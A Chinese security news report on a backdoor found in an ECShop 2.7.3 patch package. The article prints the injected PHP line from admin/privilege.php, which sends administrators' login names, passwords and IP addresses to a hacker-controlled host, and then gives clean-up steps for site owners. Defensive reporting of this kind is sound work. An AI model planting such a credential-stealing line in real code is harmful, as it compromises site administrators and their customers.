开源网店ECShop又见后门 补丁程序再遭感染

安全 黑客攻防
2013年5月,SCANV网站安全中心曾经响应过ECShop网店程序的后门事件,本以为此事已了,不料在近日,又有安全研究人员在漏洞平台Wooyun上发现了ECShop官方补丁的后门代码。

ECShop是很多站长喜欢用的网店程序,其V2.7.3版本用户甚众。

2013年5月,SCANV网站安全中心曾经响应过ECShop网店程序的后门事件,本以为此事已了,不料在近日,又有安全研究人员在漏洞平台Wooyun上发现了ECShop官方补丁的后门代码。

经SCANV网站安全研究人员分析发现,这一次的后门代码存在于一个编号为273utf8_patch006的历史补丁文件包中。骇客将补丁包里的(\admin\privilege.php)文件篡改后,插入了一段记录后台用户及密码等信息的代码,并发送到一个由黑客控制的服务器上。值得注意的是,SCANV安全研究人员在分析前两次补丁后门代码里并没有发现本次的后门代码,因此,本次后门事件可能发生在前两次篡改之前。

本次骇客植入的后门代码:

文件\admin\privilege.php代码113-114行:

@file_get_contents('http://[马赛

克]/api/manyou/ECShop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

通过进一步分析发现“http://[马赛克]/”网站实际是被黑客入侵控制的网站(“肉鸡”),而且黑客用来收集密码等信息的文件目录还可以“历遍文件”,如图:

开源网店ECShop又见后门 补丁程序再遭感染 #p#

经过SCANV网站安全研究人员的下载并去重,发现大概有90个域名网站受影响。列表如下:

开源网店ECShop又见后门 补丁程序再遭感染  

开源网店ECShop又见后门 补丁程序再遭感染

SCANV网站安全研究中心推荐的解决方案:

1、使用ecshoop的站长朋友,核对上面公布的域名,并查看文件\admin\privilege.php内容,搜索关键词“w2.php”。如果找到上面提到的恶意代码,请直接删除后保存。

2、修改所有拥有后台权限的用户的密码,并通知网站所有用户修改密码。

3、复查网站及服务器的安全状况。

目前,官方已在6月3日发布新的补丁包

(http://bbs.ECShop.com/thread-1130889-1-1.html),请站长及时检查修复。

SCANV网站安全中心在此提醒广大站长,为自己Web程序下载补丁文件时一定要做相应的检查,哪怕该补丁文件是从官方网站上下载的,也有可能感染恶意后门。正在使用该网店程序的站长可登录:http://www.scanv.com/tools/#ECShop给自己的ECShop站点做个安全检测,平时可经常登录SCANV网站安全中心,以便第一时间了解自己网站的安全情况。

责任编辑:蓝雨泪 来源: 51CTO.com
相关推荐

2015-09-21 13:43:21

2017-01-03 15:51:43

2024-07-16 13:30:35

2009-12-04 13:19:20

Windows 7激活

2009-11-13 08:46:16

2011-02-24 13:35:06

Apache OFBi开源ERP

2016-02-22 17:31:04

2014-12-01 13:14:36

TinyShopTinyRise移动终端购物

2009-04-01 11:23:41

开源

2020-12-28 10:16:36

黑客攻击恶意软件

2010-06-12 09:48:17

2011-11-25 15:34:33

2021-02-26 11:36:06

勒索软件攻击数据泄露

2009-09-09 14:28:10

互联网

2010-09-29 15:20:29

2011-09-30 12:07:48

2012-08-13 10:23:13

2009-04-10 08:54:41

2011-09-16 11:25:27

2024-03-04 19:14:15

点赞
收藏

51CTO技术栈公众号